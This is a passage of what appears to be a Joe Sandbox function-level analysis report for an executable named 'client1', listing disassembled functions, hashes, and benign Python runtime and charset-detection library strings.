                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    • API String ID: 626452242-27947307
                                                    • Opcode ID: 43851299e65b878553ee9477cdfb9aa8b38a7a1e3001ba9c1eb6bb9cebf00e3a
                                                    • Instruction ID: 33d6bd8a595d56ce9ed342310b45cadffa52998b593ac2e599da2ee738bada72
                                                    • Opcode Fuzzy Hash: 43851299e65b878553ee9477cdfb9aa8b38a7a1e3001ba9c1eb6bb9cebf00e3a
                                                    • Instruction Fuzzy Hash: BB414F32A08BC286DA30EF25B8405EAE7AAFB84790F944135DEAD87B95DF7CD451C710
                                                    Function 00007FFBAA706414 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_$Arg_ContextLong_OccurredParseSsize_tStringTupleVar_
                                                    • String ID: optional arg must be an integer
                                                    • API String ID: 983638023-4289973456
                                                    • Opcode ID: 0d090f48311a77842b732f7da3c24e88edeb1b5ad52d67a9959af1b0cf6dbba1
                                                    • Instruction ID: b7b377422bc8b3d402dc5a4834732696ad3d0389abd55373b7ae09131125513e
                                                    • Opcode Fuzzy Hash: 0d090f48311a77842b732f7da3c24e88edeb1b5ad52d67a9959af1b0cf6dbba1
                                                    • Instruction Fuzzy Hash: BC41C3A1A0AB02D5EB12CF34D8506BA67A8AF04BA4F144271ED5E537E8DF7CD547C360
                                                    Function 00007FFBAA7092AC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: internal error in PyDec_ToIntegralValue$optional argument must be a context$|OO
                                                    • API String ID: 3219279049-179024453
                                                    • Opcode ID: ba128b555d42788b89948501d1d5eec9c6d69c7b5bff48879edf53eb757dbdd8
                                                    • Instruction ID: 41d89d126ae06f5cf8ed31765be99d9c99e8ae5687af4e841e03661c1100461f
                                                    • Opcode Fuzzy Hash: ba128b555d42788b89948501d1d5eec9c6d69c7b5bff48879edf53eb757dbdd8
                                                    • Instruction Fuzzy Hash: 88416CA2E0AB02D4EB12CF71D8500BA27A8BB84B88B144172DE4D52765DF3DE947C360
                                                    Function 00007FFBAA708EE8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: internal error in PyDec_ToIntegralExact$optional argument must be a context$|OO
                                                    • API String ID: 3219279049-1730305842
                                                    • Opcode ID: 50c65c4b1bc77363ff9be1e0a7392776c951a964bc05d335280023a8a642108c
                                                    • Instruction ID: 7cda7c79c03d169d4a0ddf92e3b12596c2a2493374c132a13735a71bf41924c5
                                                    • Opcode Fuzzy Hash: 50c65c4b1bc77363ff9be1e0a7392776c951a964bc05d335280023a8a642108c
                                                    • Instruction Fuzzy Hash: 30415CA1A0AB02D4EB12CF71D8501BA37B8BB44B88F544176DE0D62665DF3DE946C360
                                                    Function 00007FFBAA734498 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: FromStringUnicode_$S_snprintfSizeSubtypeType_memcpy
                                                    • String ID: $%04X
                                                    • API String ID: 762632776-4013080060
                                                    • Opcode ID: 86c188bc8851d71fee5143397eab43a3575e426cb52b14b86a1d2f1ad77da2b4
                                                    • Instruction ID: b436c352c42d42cddae7b52aaf0ef157d3a3775e9f0e12301da6c464768cd2ad
                                                    • Opcode Fuzzy Hash: 86c188bc8851d71fee5143397eab43a3575e426cb52b14b86a1d2f1ad77da2b4
                                                    • Instruction Fuzzy Hash: 4331E5E2B0AA91C1EA269F24E8143BA63A4FF44B91F450375DE6E076D4DF2CD546C330
                                                    Function 00007FF79F627B40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF79F623699), ref: 00007FF79F627B81
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF79F623699), ref: 00007FF79F627BF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    • API String ID: 3723044601-27947307
                                                    • Opcode ID: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                    • Instruction ID: 1e8ce1385f1be308a713286a7656a1a1fe8cec77417bdd035004f334b6dd1b24
                                                    • Opcode Fuzzy Hash: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                    • Instruction Fuzzy Hash: 0D215E71B08B8285EB20BF35AC400F9B66ABB84B90F944535DA6D83754EF7CE5518321
                                                    Function 00007FFBAA709AEC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: String$CompareUnicode_With$AttrErr_GenericObject_
                                                    • String ID: context attributes cannot be deleted$flags$traps
                                                    • API String ID: 1971858050-2893424353
                                                    • Opcode ID: 16edd7599528b6f1408ea46245c3eb6fd496c10a5893597ea3cda9ca4bc5933a
                                                    • Instruction ID: fe36870b91f89ca8e14e0f21e366c73b72ddf03e46468e9be7b5c450ea7e50b4
                                                    • Opcode Fuzzy Hash: 16edd7599528b6f1408ea46245c3eb6fd496c10a5893597ea3cda9ca4bc5933a
                                                    • Instruction Fuzzy Hash: 9C1194A0A0E642D1EA029F36E95027B6798AF84FE0F4445B1DD4D577B4CF1ED883C311
                                                    Function 00007FFBAA734A44 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_ArgumentErr_FromLongLong_OccurredReadyUnicode_
                                                    • String ID: a unicode character$argument$mirrored
                                                    • API String ID: 3097524968-4001128513
                                                    • Opcode ID: c10d4c018a97ffc3e2d3961057942d7e2c7a14af83ba5a253b81f33c79b69d04
                                                    • Instruction ID: 207bfff4d5d88ae979768dde404c4e0ed1810e18b78c07bbafcda72534faf8e7
                                                    • Opcode Fuzzy Hash: c10d4c018a97ffc3e2d3961057942d7e2c7a14af83ba5a253b81f33c79b69d04
                                                    • Instruction Fuzzy Hash: 580108E0B0A653C5EA5ABF30E84417B2368EF04B55F4541B4DD1E46290DF3CE4C68334
                                                    Function 00007FFBAA7341C8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_ArgumentErr_FromLongLong_OccurredReadyUnicode_
                                                    • String ID: a unicode character$argument$combining
                                                    • API String ID: 3097524968-4202047184
                                                    • Opcode ID: 8dcec4442920f3b8f18acdd6a11acb662b49feb7bbe0bfb657696819d5b5ca8f
                                                    • Instruction ID: 825443eadaa166db4b5fc1ab0edd0337a819084055def48d20ed12a3ebe61d6d
                                                    • Opcode Fuzzy Hash: 8dcec4442920f3b8f18acdd6a11acb662b49feb7bbe0bfb657696819d5b5ca8f
                                                    • Instruction Fuzzy Hash: 04012BE4F0AA53C6EA5AAF71E84417723A8AF44754F0581B4CD2E47290DF3CE4868334
                                                    Function 00007FFBAB495C40 Relevance: 12.1, APIs: 8, Instructions: 54threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_end
                                                    • String ID:
                                                    • API String ID: 227901110-0
                                                    • Opcode ID: efcfea5e5d46490986a068cee5b321d13600a91a8803edc0f54b8972dad007c5
                                                    • Instruction ID: 31fbdcc669285b1bd0fc5a9a29856576c8a7829adb8532806c5ba8256be85958
                                                    • Opcode Fuzzy Hash: efcfea5e5d46490986a068cee5b321d13600a91a8803edc0f54b8972dad007c5
                                                    • Instruction Fuzzy Hash: 9A21EEB2A0AB0241EB564F76E99833C67A0AF55FA8F258234CE3E466F4CF2DD445C340
                                                    Function 00007FF79F639264 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: f$p$p
                                                    • API String ID: 3215553584-1995029353
                                                    • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                    • Instruction ID: ed817100ff1da9d17aa66b1a47bd593b9df385f9632904351ed2d35c52c4c5df
                                                    • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                    • Instruction Fuzzy Hash: 3C127261E0D3D346FB347A35D0542FAF6ABEB82754FC84035D6A9466C8DABCE5809F20
                                                    Function 00007FFBAA7311D0 Relevance: 10.8, APIs: 7, Instructions: 321COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
                                                    • String ID:
                                                    • API String ID: 4139299733-0
                                                    • Opcode ID: b618ed634e65c7a0afdbbdfe658f43664214b0bdfe946ac4b4ba603eb4efd133
                                                    • Instruction ID: 8bc8870396136592d181ce70e2d3912c53fca1c2290c43200ba294646bd46b20
                                                    • Opcode Fuzzy Hash: b618ed634e65c7a0afdbbdfe658f43664214b0bdfe946ac4b4ba603eb4efd133
                                                    • Instruction Fuzzy Hash: DED1ACF2B1E652C2EA32AF25D0445BA63A9FB45741F1611B1DE9E46680EF7CE843C730
                                                    Function 00007FFBAA6F87C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0$0
                                                    • API String ID: 4096353137-203156872
                                                    • Opcode ID: ae7bac968053191cdfd84e67d15d36ec98c0b24f7f8be2a30f601e8a182345f6
                                                    • Instruction ID: 70e85293e3d24eb0261308d1375f1cf17e910af1987c85519bcdc1178820d9df
                                                    • Opcode Fuzzy Hash: ae7bac968053191cdfd84e67d15d36ec98c0b24f7f8be2a30f601e8a182345f6
                                                    • Instruction Fuzzy Hash: 9E61B2B2A19B81C5E7218F25E8402BE77A8FB85B84F041175EE8D13A99DF3CD546CB10
                                                    Function 00007FF79F627C30 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                    • API String ID: 626452242-876015163
                                                    • Opcode ID: b7b82ea576924ca1617b662870f2c7e243fa9a5b0eddeb3ea6719f1292c4487d
                                                    • Instruction ID: 55a2a91df314643ba3e8a6174a936a3bd340f2ea85152a7226c0593ebf60e84f
                                                    • Opcode Fuzzy Hash: b7b82ea576924ca1617b662870f2c7e243fa9a5b0eddeb3ea6719f1292c4487d
                                                    • Instruction Fuzzy Hash: 12416232A08B8286E630FF35A8405F9E7AAFB44790F945235DA6D87BA4DF3CD452C711
                                                    Function 00007FFBAB496AF0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_word_count' cannot be deleted$attribute '_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                    • API String ID: 1450464846-1212817586
                                                    • Opcode ID: da3b90e79d9c96290f2944b119225136cbc2bb04bb772a1b2758723aee061d47
                                                    • Instruction ID: 41297441cdaf41d8928f51821b8b08ccc5eb0791c6bef63273cb6025a92d6eb5
                                                    • Opcode Fuzzy Hash: da3b90e79d9c96290f2944b119225136cbc2bb04bb772a1b2758723aee061d47
                                                    • Instruction Fuzzy Hash: BD313EA1B1A50281FF46DB76E4D527D2390EF94B94F588135DE3D067B5EE2CE895C300
                                                    Function 00007FFBAB497DE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted, xrefs: 00007FFBAB497E6C
                                                    • int, xrefs: 00007FFBAB497EF0
                                                    • attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB497DF8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted$attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                    • API String ID: 1450464846-634379450
                                                    • Opcode ID: 674400bdc108bf1514f6a8ffbf1c117d5f824281b072cbdb528c0c7ce480a579
                                                    • Instruction ID: 73305e2859ed341779a286df7f04140dc7cec97775ef923a8bfb29b84da00601
                                                    • Opcode Fuzzy Hash: 674400bdc108bf1514f6a8ffbf1c117d5f824281b072cbdb528c0c7ce480a579
                                                    • Instruction Fuzzy Hash: F4316FA2F1A50291EE56DB36E4952BD2360EF84BA4F588231DE3D077B6DF2CD8958301
